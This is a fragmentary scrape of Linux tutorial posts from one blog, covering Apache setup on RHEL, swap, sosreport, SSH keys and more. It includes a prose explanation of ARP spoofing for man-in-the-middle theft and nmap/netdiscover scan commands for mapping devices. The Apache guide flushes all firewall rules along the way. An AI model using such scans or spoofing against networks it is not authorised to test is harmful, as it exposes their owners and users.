Professional Documents
Culture Documents
Apache Web Server in RHEL
Apache Web Server in RHEL
What is a Website?
Website is just an application installed on a computer, The computer probably just has better
specifications than your computer. But fundamentally works exactly just like another system, so
it has an OS and it also has a number of applications to allow it to acts as a webserver.
So a website means it is a collection of web pages for example, when you open amazon.com it is
a website, it does not have a single web page, it has multiple web pages. When you open it you
see the whole webpage, but when you click on a certain product you will be taking towards
different web pages.
1.Web Server
2.Database
A web server is like; apache and a database is like; Mysql, Sybase…
And these are the webserver that basically understands and executes the web applications. So
web applications will be written in PHB or python, the only thing is that the webserver needs to
be able to understand and executes this application.
The database contains the data used by the web applications, so all of this is stored on a
computer called the “SERVER”.
https://www.linuxvasanth.com
The computer is connected to the internet and it has a real IP, so anybody can access that
computer and can get it. So the web application is executed by the webserver which is installed
on your server. Therefore any time you request the page or you run the web application it is
actually executed on the web server and it is not executed at the client’s computer.
So HTTP Server or web server is a network service that serves content to a client over the web,
this typically means web pages.
The difference between the normal system and the webserver is, Normal system is running
webserver software like Apache, IIS, and many more…
The web server system should be connected to the internet in order to act as a webserver
otherwise client, web client can’t contact it through HTTP, it will not be able to act as a web
server.
Typically web server hosts multiple websites, some only host a few, some others host several
hundred, but there are some dedicated servers also, based on that we will categorize web servers
in two parts.
1.Shared Hosts
2.Dedicated hosts
https://www.youtube.com/linuxvasanth
Shared hosts are the webserver that hosts websites for multiple users these are called
shared hosts.
There are some dedicated servers that will be hosting for a single user/company, called
dedicated hosts
So which servers are shared and which one is dedicated? Let’s say there is some personal
website or some small websites which do not have a huge amount of traffic, then those would be
generally hosted on shared hosts.
But when a website has traffic and millions of users accessing then that requires a dedicated
server.
1.Apache
2.Nginx
The Follow packages are required for the apache server
How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver
As you can see from the above output all the required httpd packages are available in the
Packages directory, Now install the httpd packages as follows
https://www.linuxvasanth.com
Click here to watch the Apache Webserver configuration Video
Install the elinks package as follows
https://www.linuxvasanth.com
You can check whether all the packages are installed properly by using the following commands
#chkconfig httpd on
#chkconfig httpd --list
httpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
Now let us start the httpd service as follows
https://www.linuxvasanth.com
The above error shows, Httpd service trying to resolve the server IP with the Domain name and it
failed to resolve that, In Production Servers DNS server is used to resolve the IP address with the
Domain name, Here in this tutorial I haven’t yet configured the DNS server due to lack of
servers. But we can use the /etc/hosts file for this purpose, it does the same as the DNS server for
resolving the hostname to IP address.
Now open the network config file /etc/sysconfig/network and change the name of the server to
vasanth.com
#vi /etc/sysconfig/network
NETWORKING=yes
HOSTNAME=vasanth.com
Now restart the system
#init 6
Now verify whether the server name is changed or not
#hostname
vasanth.com
U
nderstanding SWAP Memory(Virtual) in Linux Server.
Now Let me configure the web server as follows
1)ServerRoot "/etc/httpd" :It stores the config file if you want to share elsewhere you can
change this path
2)Listen 80: When a web server request comes it will enter through this port,This is the default
port for apache web server.
3)Include Conf.modules.d/*.conf:In this you can add additional modules,configurations like for
example you want to install PHP and want to have an website based on the PHP,in that case
you have to addsettings related to apache PHP module.
4)User apache Group apache: Will be responsible to start and check apache services and
daemons.
5)ServerAdmin support@linuxvasanth.com: Any issues related with webserver it send the mail
6)DocumentRoot "/var/www/html": This is the Location where html file or any code related to
website will be stored here.When a browser opens up a page,it looks for the page here in
/var/www/html on the server where pages are served.
NOTE:If this does not exists then the webserver will not be able to serve any web pages
#iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
ACCEPT udp -- anywhere anywhere udp dpt:bootps
ACCEPT tcp -- anywhere anywhere tcp dpt:bootps
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT icmp -- anywhere anywhere
#iptables -F
-L =To list all the firewall policies and rules sets
-F =To flush out all the existing policies and rules sets
iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
https://www.linuxvasanth.com
Check the status of the Apache service
#netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 :::5900 :::* LISTEN 2649/vino-server
tcp 0 0 :::111 :::* LISTEN 1202/rpcbind
tcp 0 0 :::80 :::* LISTEN 4236/httpd
tcp 0 0 :::22 :::* LISTEN 1682/sshd
https://www.linuxvasanth.com
Until you change the value of DocumentRoot directive in the httpd.conf file, apache will check
for the web pages in its default location /var/www/html directory, Let me create a very basic
html web site as follows
#cd /var/www/html
#vi index.html
<html>
<center> WELCOME TO LINUXVASANTH.COM<center>
</html>
:wq!
#
https://www.linuxvasanth.com
https://www.linuxvasanth.com
Now check the configuration for possible errors by using the following command
How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver
If you want the apache webserver service to start automatically at the boot time, run the below
command
#chkconfig httpd on
Now open the browser and check it as follows
https://www.linuxvasanth.com
As you can see from the above output, when I call the webserver IP address from the search
window, the website (demo) web pages it started serving, We have successfully configured the
apache web server in Linux boxes.
Let me try it from the Windows client system to check whether the webserver is allowing to
access the website web pages
https://www.linuxvasanth.com
From the above output, the Webserver is working fine, anyone can access the webserver now .
#vi /etc/httpd/conf/httpd.conf
Control who can access from webserver
Deny from 192.168.43.210
:wq!
https://www.linuxvasanth.com
Restart the Apache service to update the configuration details
https://www.linuxvasanth.com
As you can see from the above output, It is showing only the test page, it is not allowing to
access the website and its web pages as we have blocked this IP to access the webserver.
Let us try to secure the website in the apache web server with the password-based protection, go
to the configuration file and look for the heading control who can get the stuff from a web server
and add the below things as suggested
#vi /etc/httpd/conf/httpd.conf
Allow from all
AuthType Basic
AuthName "Password Restricted Area
AuthUserFile /etc/httpd/userauthfile
Require user rheluser007
:wq!
https://www.linuxvasanth.com
Now create a User auth File That Will Holds User Accounts
By using the “htpasswd” command we can create and update files used to save the user
names and passwords for the authentication of HTTP users. Resources available from the
Apache HTTP server is restricted to users listed in the files created by the htpasswd command.
#htpasswd -cm /etc/http/userauthfile rheluser007
https://www.linuxvasanth.com
Now try to access the Apache web server, this time it will ask you to type the HTTP authorized
user name and password to get the access
#service httpd restart
Stopping httpd: [ OK ]
Starting httpd: [ OK ]
https://www.linuxvasanth.com
I hope you have enjoyed this article. Do subscribe and share it with your friends
My Youtube Channel
My Facebook Page
My Twitter Page
Click here to Subscribe linuxvasanth.com weekly Updates
1. Apache Web Server in RHEL Server » Vasanth Blog on Understanding SWAP
Memory(Virtual) in Linux Server.July 10, 2021
[…] Understanding SWAP Memory(Virtual) in Linux Server. […]
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
[…] https://www.linuxvasanth.com/install-packages-redhat-linux/ How to install
packages with “rpm” tool […]
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
Understanding SWAP
Memory(Virtual) in Linux
Server.
25 May 2021 VASANTH NIRMAL
In this tutorial, we will see what is Swap Memory and how to implement a swap file/partition on
Linux to increase the performance of the server.
Swap space on a disk that is used when the amount of Main memory(Physical memory) is
Full. When a Linux server is running out of RAM, all the inactive pages are moved from
the RAM to the swap space.
The swap space can be configured either from the dedication partition or from a separate swap
file.
Swap memory can be configured in two methods, In this tutorial, I will show how to configure
with swap dedicated partition.
1.Swap Partition
2.Swap File
Swap Partition:This one is the default swap memory,a hard drive partition that is dedicated to swapping.
Swap File: This one is manually created type swap memory,when there is no space left in the hard drive,swap
file is manually created by the adminstrators.
It allows to run more/huge applications continously that needs a large amount of RAM.
As long as free memory remains below the thershold,no swap space is used.
Ex:1 How to Create a Swap Partition in Linux Server?
We can create a swap partition as a regular partition, by using the “fdisk” command.
How big should your Linux Swap? The Recommended
swap space is
Server with 4GB of RAM or Less require Minimum 2GB of Swap Space
Server with 4GB to 16GB of RAM require Minimum of 4GB of Swap Space
Server with 16GB to 64GB of RAM require Minimum of 8GB of Swap Space
Now let me create a new swap space partition on my /dev/sda Hard disk as follows
Click here to view how to create a partition using the Fdisk utility
#fdisk /dev/sda
WARNING: DOS-compatible mode is deprecated. It's strongly recommended to
switch off the mode (command 'c') and change display units to
sectors (command 'u').
https://www.linuxvasanth.com
5.The first avaiable sector for the parition let it be the default one,dont give any value manually unless it is
required,the system takes the default sector.
6.Type the size of the parition in MB/GB/KB
7.Verify the partition by using the "p" option
8.Each and every paritions in the system will use some labels for the system identifier.If you want to display
all the labels numbers type "l" and enter
https://www.linuxvasanth.com
8.Each and every paritions in the system will use some labels for the system identifier.If you want to display
all the labels numbers type "l" and enter
9.The value 82 is used as the parition identifier for the swap
10.To use the parition for the swap space you must have to change the parition type.
11.Type "t" and press enter
12.Now give 82 and press enter
13.Verify the changes with the "p" option
14.The fdisk command will not save the changes in its memory until we manullay confirm,now type "w" to
save the change in kernel memory
https://www.linuxvasanth.com
Now reboot and create a new file system on the swap partition as follows
#init 6
After reboot Format the swap partition
As we know in order to store the data in a partition we must have to format the partition,
unlike a regular partition which is used to hold/store the user data, a swap partition is
used to hold/store the system data
mkswap is the command used to format a partition with swap space.
Remember this command will not create a filesystem on the partition, rather it adds the
swap identity in the partition. It stores the signature in a single block of data and left the rest of
the partition unformatted and this unformatted space is used to hold/store the memory pages.
#mkswap /dev/sda3
Setting up swapspace version 1, size = 2104508 KiB
no label, UUID=cf364f76-6993-44e1-a981-73382d70e4a1
https://www.linuxvasanth.com
Now we have created a swap a partition in Linux server and now its ready to use for swap space.
#swapon /dev/sda3
Now Check the status of the swap space by using the following command
#swapon -s
Filename Type Size Used Priority
/dev/sda3 partition 2104504 0 -1
https://www.linuxvasanth.com
Run the following command to check the ongoing status of memory
# free
total used free shared buffers cached
Mem: 1400364 296608 1103756 0 28668 102016
-/+ buffers/cache: 165924 1234440
Swap: 2104504 0 2104504
As you can see from the above output swap size 2GB (2104504) created and 0 indicates no
swap space is used so far, which means the server still running with sufficient RAM(memory).
https://www.linuxvasanth.com
That’s all we have successfully configured the swap space in the Linux server, When the server
running out of physical RAM, it starts using the swap space immediately to enhance the server
performance.
To Mount the swap space permanently you have to add the swap parition details in
the /etc/fstab file
#vi /etc/fstab
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/sda2 /hbo ext4 defaults 0 0
/dev/sda3 swap swap defaults 0 0
https://www.linuxvasanth.com
1.The parition which we want to mount(/dev/sda3)
2.The mount point dir name(swap)
3.The Filesystem type for the partition(swap)
4.The default options(read and write)
5.To activate dump on this device give 1 otherwise give 0
6.To check for any error during booting by fsck,to enable 1,to disable 0
Note: Swap space is only used when the Main memory utilization extends the
threshold
I hope all of you have enjoyed this article,Kindly do visit and Subscribe My Social Network
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
The Kernel is a Program that composes the central core of an Operating system. It has complete
control over everything that occurs in the system.
A Kernel can be compared with a shell(like bash, Korn, bourne, etc…in UNIX Based OS)
which is the outermost part of the operating system and a program that communicates with users
executable commands. The kernel itself never interacts directly with the user, but rather interacts
with the shell and other programs as well as with the hardware devices on the system like hard
disk, CPU, Memory, etc…
During the system booting process, Kernel is the first part of the Operating
system that gets loads in to the memory and it remains there for the entire
duration of the system session because its services are required continuously.
Because of its critical nature, the kernel code is usually loaded in to the safest area in the
memory, which prevents it’s from being over-written by someone or by application programs.
The kernel performs its tasks, executing processes, handling the interrupts in the kernel space,
everything a user normally does inserting the text in a text editor, running program
in GUI(Graphical User Interface) is done in userspace. This separation is made in order to
prevent user data and kernel data from interfering with each other and thereby it keeps the
system away from crashing or unstable.
When a system crashes, it actually means the kernel has crashed. If only a single program has
crashed but the rest of the system remains in operation, then the kernel itself has not crashed. A
crash is a situation in which a program or user application stops performing its expected
functions and responding to other parts of the Operating system. The program might appear to
the user to freeze. If such a program is critical to the operation of the kernel, the entire system
could shut down.
The kernel provides basic services for all other parts of the OS, like Memory management,
Process management, File management, and Input and Output Management(which means
accessing peripheral devices). These services are requested by other parts of the OS or
application programs through a specified set of program interfaces referred to as “system calls”
Process Management, The most important aspects of a kernel to the user, is a part of the kernel
that ensures that each process obtains its turn to run on the processor and that individual
processes do not interfere with each other by writing to their areas of memory, A process also
referred to as a task, can be defined as an executing(running) instance of a program.
The Kernel should not get confused with BIOS, The BIOS is an independent program stored in a
chip on the motherboard that is used during the booting process for doing the tasks such
as initializing the hardware and loading the kernel in to the memory. The BIOS always
remains in the system and is specific to its particular hardware, the Kernel can be easily
replaced or upgraded the OS and in the case of Linux, by adding a newer kernel or
modifying the existing kernel.
Most kernels have been developed for a specific Operating system. and usually only one version
available for each Operating system. For example, Microsoft Windows 2000 Kernel is the only
kernel for Microsoft Windows 2000 and Microsoft 98 kernel is the only kernel for
Microsoft Windows 98.
But LINUX is far more flexible in that there are numerous versions of
the Linux kernel, and each of these can be modified in innumerable ways
by a registered user.
A few kernels have been designed with the goal of being suitable for use with any OS, The best
known of these is the “Mach Kernel” used in the Macintosh OS X operating system.
The term Kernel is frequently used in Books and in discussions about Linux, whereas it is used
less often when discussing some other operating systems, Such as Microsoft Windows
Systems. The reasons are that the kernel is highly configurable in the case of Linux and
users are always encouraged to study about and modify it and to download and install the
latest versions. With the Microsoft Windows Operating systems, in contrast, there is
relatively little point in discussing kernels because they cannot be modified or replaced.
I hope you have learned the basics of the Kernel.
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
Troubleshooting is the art of handling a problem, collecting the information about it, analyzing
it, and at the last solving it, while fixing an issue is one of the major parts of troubleshooting, as
many admins know there are two parts that can’t be skipped, Documenting the Problem and
Root Cause Analysis(RCA).
Let me tell you how to resolve an issue with the redhat resource support
To execute the sosreport,sos package must be installed before,if it is not installed then try install
it with the “yum” command
#yum install sos
The output of the sosreport is the common beginning point for the Redhat Technical engineers
when they performing the initial analysis of a service request for the RedHat Enterprise Linux
Servers.
https://www.linuxvasanth.com
https://www.linuxvasanth.com
123456=Is the service ticket number(you have to provide the registerd service request number with Redhat)
vasanth=Username of the technical person
Once it has completed,sosreport will create a compressed file under the /tmp path(RHEL 6 and
earlier) and /var/tmp(For RHEL 7 and above)
Ex:2 To Print all the available Modules(Plugins) run the below command
#sosreport -l
https://www.linuxvasanth.com
Many times the support team will ask you the sosreport with some specific options, for
example, there is an issue that is going on with the apache web server, the support team is
asking to run the sosreport with the apache plugin for analysis.
Ex:3 To get the particular plugin sosreport run the following command
#sosreport -k apache.log
You can also untar the sosreport from the /tmp path for analysis
#cd /tmp
#ls
sosreport-vasanth.123456-20210309121144-0a42.tar.xz
#tar -xvf sosreport-vasanth.123456-20210309121144-0a42.tar.xz
#ls
MYserver-2021030912111615272085
https://www.linuxvasanth.com
Now that would be easy for the support team to check all the files, all the config files related to
the apache, so you need not to worry about what plugins you need to run, many times I have seen
that the support team will ask you, you have to run the sosreport with that options, so that would
be easy for us and for them to troubleshoot the issue.
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
Admins can use these tools to find the cause of a performace issues.Let me give you some
important default tools as well some add-on tools to monitor the Linux server Health.
Mpstat:
mpstat tool writes to standard output activities for each available processor, processor 0 being
the first one. Global average activities among all processors are also reported. This command
will give you the full CPU utilization report.
Ex:1 To Print the Five reports of Global statistics
among all processors at two-second intervals
#mpstat 2 5
ARP-Born to be Hacked Protocol
The interval parameter specifies the amount of time in seconds between each reports
Note: /proc Filesystem must be mounted for the "mpstat" command to work
Ex:2 To print statistics about users connect time
ac command without options will print out the report of connect time(in hours) based on the
Login/Logouts in the current wtmp file
#ac
total 1030.04
Ex:3 To print the statistics for each day
Use the option -d will dispaly you the total Login time in hours by day wise
#ac -d
https://www.linuxvasanth.
com
Ex:4 To Print time totals for each user in Hours
with -p option will display the Total login for each and every user in Hours
https://www.linuxvasanth.com
Ex:5 To Print individual user Time details
If you want to print the total Login time statistics for a user(for example Nirmal) in hours
https://www.linuxvas
anth.com
Ex:6 To Print the Date wise Login Time of User
Use the -d option with the ac command will print the date wise Login time for user “root“
https://www.li
nuxvasanth.com
Ex:7 How to Execute a Command with TimeLimit?
By Default Linux comes with a Lot of default tools, each and every command is very unique and
used in different cases. By using this “timeout” command user can set a time limit for any
command you want, once the given time expires, it stops executing the command
timeout=It runs a command with Time Limit,start a command and kill it if still running after NUMBER seconds
Syntax to run the timeout command:
#timeout <options> <Durations> <command>
Ex:8 To run a command with a timeout seconds?
Use a command with some timeout value in seconds,Let us try to use it with the “ping”
command ,timeout the ping command after 8 seconds
#timeout 8s ping google.com
Important and Useful “df” and “touch” Commands in Linux/UNIX
Note:With out adding the seconds(s) with the value will also work
#timeout 8 ping google.com
https://www.linuxvasanth.com
You can also use the following options as per the requirement
-m =In Minutes
-h =In Hours
-d =Representing days
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
5. Apache Web Server in RHEL Server » Vasanth Blog on Yum configuration in Redhat
Linux 6July 10, 2021
General
RedHat 7.0
RHEL Networking
RHEL(Red Hat Enterprise Linux)
SHELL SCRIPTING
SOLARIS
UNIX
1 Comment RHEL(Red Hat Enterprise Linux) Linux, monitoring, networking, timeout 1 Mar
2021 VASANTH NIRMAL
https://www.linuxvasanth.com
As you can see from the above output, it is showing the partition name, total size, usage size,
Available size, and where it is mounted.
https:///www.linuxvasanth.com
Ex:3 To Print the Details Of a Particular
Partition/Filesystem?
When you run the “df” command without any argument it will display all the filesystem
information on your console, When you want to print only particular filesystem information then
you can add that at the argument
https://www.linuxvasanth.com
Ex:4 To Display the Size in Human Readable Format
As you can see from the above examples, the sizes are unreadable, to view the sizes in MB, KB,
GB(Ex:12M,2G,4K) format you will have to use the option -h along with the “df” command,
here -h indicate Human readable format.
https://www.linuxvasanth.com
Ex:5 To Print the size in MB
To print the size in MB ,use the -m option with the “df” command
https://www.linuxvasanth.com
Ex:6 To Print the File system Inode Usage details
With the “df” command add the -i option to print the inode usage for a File system.
https://www.linuxvasanth.com
Ex:7 To Print the File System Type
As you can see from the output of the previous example, you will not see the tab “Filsystem
Type“.To get that use the “-T” option with the “df” command
https://www.youtube.com/linuxvasanth
Ex:8 To Include a Particular File System type
If you want to display only a certain file system type then use the -t option with the df command.
https://www.linuxvasanth.com
Touch Command Usages
the touch command is a handy one to generate a file, modify the time stamp details in UNIX and
Linux based systems. With the touch command, we can use some options for various purpose, let
us see the options first
https://www.linuxvasanth.com
Ex:2 How to Change File Access and Modification
Time
If you want to change or update the last access and modification time of a file say for
example /mydoc , then use the -a option as follows, this will set the current time and date on a
file.
Note: If the file /mydoc does not exist, it will create a new file with the name.
https://www.linuxvasanth.com
Ex:3 How to Change File Modification Time
When you want to change only the modification time for a file means use the -m option with the
touch command
https://www.linuxvasanth.com
Ex:4 To use the Time Stamp of Another File
use the -r option with the touch command, will update the timestamp of “myfile” with the time
stamp of “mydoc” file, So then both the file holds the same time stamp.
https://www.linuxvasanth.com
Ex:5 How to create a file using a Specified Time stamp
detail
If you want to create a file with a specified time then use the following syntax
https://www.linuxvasanth.com
If you want to know more about the “df” and “touch” commands you can use the
command “man df and man touch”.
1. Apache Web Server in RHEL Server » Vasanth Blog on Understanding SWAP
Memory(Virtual) in Linux Server.July 10, 2021
[…] Understanding SWAP Memory(Virtual) in Linux Server. […]
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
ARP-Born to be Hacked
Protocol
8 Oct 2020 VASANTH NIRMAL
Address Resolution Protocol(ARP) is a Network-Based protocol that is used to check out the
MAC address/Hardware address of a device(host/hardware) from an IP address,i.e the ARP is to
convert a 32-bit IP address to 48-bit MAC address.
How does it Work?
As we know in order to communicate with the systems in a network, the source wants to check
and find out the MAC address of the destination device in its ARP table/cache. If the MAC
address info is available, then it will use the MAC address for communication. Almost in all
Operating systems, we can use the command arp -a to list the MAC and IP details from the ARP
table.
Why ARP is not secured?
For example in a network we have four systems, all the devices are connected to the same
network, Lets assume Device A needs to communicate with Device C, also assume that Device
A knows the IP address of Device C, As we know to communicate these devices within the same
network Device A needs to know the MAC address of Device C.
So now what this client does (DEVICE A) it uses the ARP protocol, which means basically, it
sends a Broadcast message (Sends an ARP request to all the clients on the network) saying who
has 10.0.2.6.
Encrypt and Decrypt A File Data Using GPG/PGP Algorithms
Now all of the devices will ignore this packet except the one that has this IP address 10.0.2.6,
this way Device A will have the MAC address of Device C and now it will be able to
communicate with Device C, So all of this communication is facilitated using the ARP protocol.
Device A IP Address: 10.0.2.7
Device B IP Address: 10.0.2.5
Device C IP Address: 10.0.2.6
Router IP Address: 10.0.2.1
ARP all it has is Request and Response, so each computer will have an ARP table which Links
IP address on the same network to their MAC address, As you can see from the below output the
router IP is linked with its MAC address
https
://www.linuxvasanth.com
The main reason why ARP is not secure is coz first of all clients can accept responses even if
they did not send a request. Anyone can send a response to the access point and a response to the
victim telling them I am at a specific IP without them asking who am I or without them asking
for this IP I am just gonna send a response and they are gonna accept that response anyway, not
only that they are also not going to verify who am i.
Attackers will do the same with the victim, so they will send it an ARP response, they are gonna
tell it that I am at 10.0.2.1, so it’s gonna update its ARP table and associate the IP
of 10.0.2.1 with my own MAC address, so the result of this is the victim is gonna think that I am
the router and the router is gonna think that I am the victim.
So anytime the victim wants to send any requests, the requests will have to flow through the
attacker system and he will forward it to the router, and anytime the router wants to send
responses, they are gonna go to the attacker system, coz it thinks that I am the victim and then I
am going to forward it to the victim.
Note: Communication inside the network is carried out using the MAC address and not using
the IP address.
This is the major drawback of ARP protocols, attackers could easily become Man in the middle
attack by using ARP spoofing. This attack even could steal all your sensitive information.
Learning more about the ARP makes many networking situations more clear, Its one of the
things you need to understand to be in the top 5% of IT Professionals.
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
Scenario: For instance when you have deleted some important data’s or files after creating a
snapshot ,Nothing to worry because we have the snapshot which holds the original data’s/files
which you have deleted.
Note:Snapshots can’t be used for backup as backup are the main/primary copy of data’s,that is
the reason you cannot use the snapshot as your backup option.
Click the below Link to know about LVM Partitions ,to create Physical Volumes,Volume groups
How to create Disk Storage/Extend sizes with LVM
#vgs or vgdisplay
As you can see from the above output 22GB of free space are left in the above Volume
group(VG) don.Let me create a snapshot for my Lv bankdata.
I am going to create a snapshot volume with the size 1GB for demo purpose.
As you can see from the above output Snapshot volume has been created succesfully with the
size of 1GB,From the above output the “origin” column says that the snapshot is taken from the
source volume “bankdata”,the “snap%” showing 0.00 which indicates no datas have been
updated to that volume so far,Let me add some datas to the volume “bankdata” and then check
the snapshot volume size again
As you can see from the above output the volume now utilized some disk space,Now check the
logical volume size
For More Video Tutorials Visit My Linux Vasanth You Tube Channel
This time as you can see the snap shot volume also synced ,whenever you put some data’s in the
source volume,the snapshot linked with this volume will also get synced equally.
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
1. Password Based Authentication
2. Public Key Based Authentication
What is Public Key Authentication?
It can be also known as Password Less Secured Shell Authentication,there are some advantages
with this Public Key Based Authentication,They are
1. Much Secure to the user passwords because it works only with the public and private Key
Cryptographic
2. It can be easily Configure
To Know More about Public and Private Key cryptography algorithm click
https://www.linuxvasanth.com/learn-how-to-encrypt-and-decrypt-a-file-data-using-gpg-pgp-
algorithms-in-linux/
Initial Check up’s before we start Configure Password
less SSH Key
The first most important thing is you will need to configure one Public Key and then verify
whether the SSH Client key already exits,run the following command to verify that
If the key doesn’t found then it will print you the output as follows
#ssh-keygen -t rsa
The above command can also be run with the default type as follows
If you want a stronger key then you can mention it manually with the -b option,Because the
default Key is 2048 Bits.
To generate Key with Stronger Security
Run the above command with the -b option as follows
ww
w.linuxvasanth.com
Note:The Private Key will be stored by default in the path .ssh/id_rsa file
Note:The Public Key will be stored in the default path .ssh/id_rsa.pub file
The combination of both the keys(Private and Public Keys) generates a complete Key stream
https://www.linuxvasanth.com
Now as you can see from the above output check the id_rsa file you will see the private key is
encrypted,now upload the public key to the remote Linux server
#ssh-copy-id vasanth@192.168.43.68
https
://www.linuxvasanth.com
Now the Public Key is Generated and stored in .ssh/authorized_keys file under the remote user
home directory path.
Log in to remote server with SSH
#ssh vasanth@remote ServerIP
#ssh vasanth@192.168.43.68
Now you will have to enter the passphrase key RSA to unlock the private Key.If you enable the
Automatically unlock this key whenever i’m logged in,then you dont have to type passphrase
anymore.
https://www.youtube.com/channel/UC6bR8In-jj9-klVlZQ6YH_A
After successfully entered the key passphrase,it will allow you to log in to the remote server.Let
us log out and log in again from the remoterserver
#exit
#ssh vasanth@192.168.43.68
This time it allow you to log in automatically with out having type the passphrase,Now on wards
you can login and transfer the data with out having to type the password,with scp we will transfer
the data,scp comes along with the ssh family.
I hope this article is useful for you to implement password less login in SSH
If you Find this article useful,then subscribe to my website and YouTube channel to receive
more Linux tutorials
Follow Me On Social Networks
Click here to Subscribe linuxvasanth.com
General
RedHat 7.0
RHEL Networking
RHEL(Red Hat Enterprise Linux)
SHELL SCRIPTING
SOLARIS
UNIX
1. Apache Web Server in RHEL Server » Vasanth Blog on Understanding SWAP
Memory(Virtual) in Linux Server.July 10, 2021
[…] Understanding SWAP Memory(Virtual) in Linux Server. […]
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
1. IP address
2. MAC address
3. Operating System name
4. Open ports
5. Running services and many more…..
Let me show you the examples how to run the scans
https:
//www.linuxvasanth.com
#netdiscover -r 192.168.43.1/24 (-r=Mean "range" to scan given range instead of auto scan)
This method will work on real network or even in wifi/wireless network.
Click here to Subscribe my YouTube Channel
https://www.linuxvasanth.com
As you can see from the above output,The IP address ,device name ,MAC address everything it
showed
Note:IP’s in the same sub net would start 192.168.43.0 and they would end at 192.168.43.254
You can also the nmap tool to gather sensitive information about connected devices,nmap is an
huge security scanner for IPV4 ranges.
Zenmap Is the Graphical User Interface of nmap,you can put any name or IP to scan,whether it
is personal system or Server or IP for a web server for a website.
#nmap -sn 192.16.43.1/24
Will display the following
1.Connected devices in a Network
2.Their MAC address
3.Host UP/DOWN
4.Device name
Let us see another one example with different options this time,
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
General (3)
RedHat 7.0 (3)
RHEL(Red Hat Enterprise Linux) (58)
RHEL Networking (17)
SHELL SCRIPTING (7)
SOLARIS (4)
UNIX (9)
Apache Web Server in RHELJuly 10, 2021
Understanding SWAP Memory(Virtual) in Linux Server.May 25, 2021
What is KERNEL Program?May 4, 2021
How to Configure Local Yum Repository Server using ISO in RHEL 7.0 VerApril 16,
2021
What is Systemd(systemctl) Dameon in RHEL 7/RHEL 6March 31, 2021
How to Generate Sosreport in Linux Server(RHEL 6.x/RHEL 7.X)March 9, 2021
Linux Server Monitoring Commands/ToolsMarch 1, 2021
Important and Useful “df” and “touch” Commands in Linux/UNIXDecember 13, 2020
Leave a comment RHEL Networking arp, macaddres, netdiscover, Network
configuration, Network tool, networkmapper, portmap, tcp/ip 14 Aug 2020 VASANTH
NIRMAL
Note:You might be boring reading the whole explanations but i can ensure, you will
understand the theory behind the public and private encryption how it is working.
So always we need to be very careful about the network we select to access is a trusted one and it
is using the end to end encryption algorithms,so that even if any one intercept the data they could
not view or read the content ,it will be useless because it will be simply gibberish and it will be
only decrypted once it is received by the person that we want them to receive it.
This is all great but first of all we have to trust that these methods of communications are
implementing the encryption correctly, that there are no problems or no flaws in the way that
they are encrypting and decrypting the data.
What if we want to send a data through a website or through a form of communication that
